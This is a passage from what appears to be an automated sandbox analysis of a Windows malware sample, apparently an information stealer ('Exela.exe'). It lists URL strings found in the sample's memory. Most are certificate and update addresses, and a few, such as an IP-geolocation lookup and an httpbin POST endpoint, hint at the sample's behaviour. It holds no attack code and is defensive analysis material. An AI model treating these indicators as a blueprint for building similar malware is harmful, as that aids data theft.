SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1650926851.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1658168645.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657238771.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651284062.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656220023.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652009836.000001FC75805000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651407307.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651676745.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657738135.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651745342.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651188730.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657012917.000001FC75808000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651594328.000001FC7580F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651004020.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651489697.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651827238.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652100311.000001FC75806000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656536234.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651594328.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1655357139.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651745342.000001FC7580F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651915607.000001FC75803000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657899166.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1650926851.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1658168645.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657238771.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657738135.000001FC75815000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651284062.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656220023.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652009836.000001FC75805000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651407307.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651676745.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657738135.000001FC75808000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: svchost.exe, 0000003B.00000002.2895821645.000001B777C0E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.ver)
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651594328.000001FC7580F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651004020.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651489697.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651827238.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652100311.000001FC75806000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656536234.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651594328.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1655357139.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651745342.000001FC7580F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651915607.000001FC75803000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657899166.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1650926851.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1658168645.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657238771.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657738135.000001FC75815000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651284062.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656220023.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652009836.000001FC75805000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651407307.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651676745.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657738135.000001FC75808000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656121294.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656121294.000001FC75815000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1830677200.0000023B784B3000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1830677200.0000023B784A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656121294.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1830677200.0000023B784A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651004020.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651489697.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651827238.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652100311.000001FC75806000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656536234.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651594328.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1655357139.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651915607.000001FC75803000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657899166.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1650926851.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1658168645.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657238771.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651284062.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656220023.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652009836.000001FC75805000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651407307.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651676745.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657738135.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651745342.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651188730.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657012917.000001FC75808000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651004020.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651489697.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651827238.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652100311.000001FC75806000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656536234.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651594328.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1655357139.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651915607.000001FC75803000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657899166.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1650926851.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1658168645.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657238771.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651284062.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656220023.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652009836.000001FC75805000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651407307.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651676745.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657738135.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651745342.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651188730.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657012917.000001FC75808000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: Exela.exe, 00000051.00000003.1825195317.0000023B784A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656121294.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656121294.000001FC75815000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1830677200.0000023B784B3000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1830677200.0000023B784A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656121294.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1830677200.0000023B784A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656121294.000001FC75815000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1830677200.0000023B784B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digice
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651745342.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1824462822.0000023B784A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCer
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656121294.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656121294.000001FC75815000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1830677200.0000023B784B3000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1830677200.0000023B784A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651004020.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651489697.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651827238.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652100311.000001FC75806000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656536234.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651594328.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1655357139.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651915607.000001FC75803000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657899166.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1650926851.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1658168645.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657238771.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651284062.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656220023.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652009836.000001FC75805000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651407307.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651676745.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657738135.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651745342.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651188730.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657012917.000001FC75808000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656121294.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1830677200.0000023B784A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656121294.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1830677200.0000023B784A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1990622954.000002DCCF730000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.kill
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1990622954.000002DCCF730000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.returncode
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1989119445.000002DCCF110000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.terminate
Source: svchost.exe, 0000003B.00000003.1758408950.000001B777A78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: svchost.exe, 0000003B.00000003.1758408950.000001B777A78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: svchost.exe, 0000003B.00000003.1758408950.000001B777A78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: svchost.exe, 0000003B.00000003.1758408950.000001B777A78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 0000003B.00000003.1758408950.000001B777A78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 0000003B.00000003.1758408950.000001B777A78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 0000003B.00000003.1758408950.000001B777AAD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: svchost.exe, 0000003B.00000003.1758408950.000001B777B67000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1974121570.000002DCCEF1D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1969112805.000002DCCEF19000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1987192175.000002DCCEF1E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://httpbin.org/post
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2000591564.000002DCD1B20000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ip-api.com/json
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1670341282.000002DCCEF78000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://json.org
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651004020.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651489697.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651827238.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652100311.000001FC75806000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656536234.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651594328.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1655357139.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651915607.000001FC75803000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657899166.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1650926851.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1658168645.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657238771.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651284062.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656220023.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652009836.000001FC75805000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651407307.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651676745.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657738135.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651745342.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651188730.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657012917.000001FC75808000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651594328.000001FC7580F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651004020.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651489697.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651827238.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652100311.000001FC75806000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656536234.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651594328.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, 